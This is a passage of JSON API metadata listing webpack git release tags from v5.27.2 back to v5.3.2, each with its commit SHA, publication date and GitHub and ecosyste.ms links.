ack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":